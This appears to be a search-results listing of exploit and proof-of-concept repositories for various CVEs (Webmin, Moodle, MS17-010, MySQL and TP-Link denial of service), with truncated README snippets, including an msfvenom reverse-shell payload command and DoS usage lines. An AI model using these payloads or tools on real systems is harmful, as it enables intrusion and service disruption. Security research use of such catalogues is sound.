1300057 matches found
get-pixels-updated
This is an updated version of get-pixels which patches the CVE-2020-8175 security issue. At the time of creation, every file is the same as the ones from the original repository, excluding the package.json. get-pixels-updated The following is from the GitHub page. As mentioned before, this...
CVE-2021-39863
This repository does not have a README...
CVE-2024-21338_PoC
Exploit poc for CVE-2024-21338...
CVE-2021-29447-POC
CVE-2021-29447 Proof of Concept Proof of Concept for CVE-2021-29447 written in Python. Details about the CVE can be found at https://vulners.com/cve/CVE-2021-29447 Disclaimer This script is a PoC for authorized ethical security testing only. Usage root@kitploit: usage: python3 CVE-2021-29447.py -...
Apache-Druid-CVE-2021-25646
Apache-Druid-CVE-2021-25646 Youtube https://www.youtube.com/watch?v=-mdK5HSRiQU...
CVE-2018-8611
This repository does not have a README...
mysql_dos
This tool crashes vulnerable MySQL servers using CVE-2017-3599, a remote integer overflow when parsing login credentials. It can be downloaded here you will need to run it from the command line Usage: mysqldos target port...
CVE-2024-6387
CVE-2024-6387 Installation and Execution of the Script 💻 Prerequisites Before starting, make sure you have the following tools installed on your machine: Python 3.x Git pip to manage Python dependencies Installation Steps 1. Clone the repository Use git to clone the repository: root@kitploit: git...
CVE-2012-2982
CVE-2012-2982 POC en Python para el CVE-2012-2982 Webmin 1.580 mejorado del original por el usuario OstojaOfficial Esta es una versión mejorada del script original que permite al usuario ver el formato de entrada de los datos sin necesidad de ver todo el script para descubrirlo. Para ello,...
cve-2018-6574
This repository does not have a README...
cve-2016-7255_x86_x64
cve-2016-7255 x86, x64 porting CVE-2016-7255 to x86 for educational purposes. reference code https://github.com/rlarabee/exploits/tree/master/cve-2016-7255...
Ivanti-Connect-Secure-Logs-Parser
Ivanti Secure Connect Logs Parser This repository provides a Python script designed to convert Ivanti Secure Connect .vc0 log files into CSV format for digital forensics and incident response. In particular, the parser: Extracts timestamps from Ivanti log files notably from .vc0 files. Converts...
cve-2019-14287-PPT
This repository does not have a README...
TPLink-VN020-DoS
TPLink-VN020-DoS TPLink VN020-F3v Denegación de Servicio CVE-2024-12342 Uso: python3 CVE-2024-12342.py 192.168.1.1 python3 CVE-2024-12342.py 192.168.1.1 -p 8080...
CVE-2019-0708
CVE-2019-0708 POC-CVE-2019-0708 Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 7 for x64-based Systems SP1 Microsoft Windows Server 2003 Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 Microsoft Windows Server 2008 R2 for x64-based Systems SP1 Microsoft Windows Server...
MS17-010_CVE-2017-0143
MS17-010 🖥️ -h3x0v3rl0rd- ️⃣ CVE-2017-0143 Docker Usando msfvenom para generar un payload: root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe -p windows/shellreversetcp: Especifica el payload una shell TCP reversa para Windows. LHOST=10.10.14.4:...
Moodle-CVE-2024-43425-Exploit
Moodle RCE Exploit CVE-2024-43425 This repository contains a Python exploit script targeting a remote code execution RCE vulnerability in Moodle CVE-2024-43425. Disclaimer: This tool is provided AS IS for educational and research purposes only. Use it only on systems where you have explicit...
CVE-2022-24497
CVE-2022-24497 Un detector Zeek para CVE-2022-24497: https://vulners.com/cve/CVE-2022-24497 Ejemplos de notificaciones del PCAP de prueba: root@kitploit: separator \x09 setseparator , emptyfield empty unsetfield - path notice open 2022-04-13-21-45-25 fields ts uid id.origh id.origp id.resph...
CVE-2022-38181
This repository does not have a README...
apche_unomi_rce
CVE-2020-13942 Original blog post about the vulnerability: https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ There are two RCE vectors: through MVEL injection and through OGNL injection. Both vectors target different code though the payloads look relativel...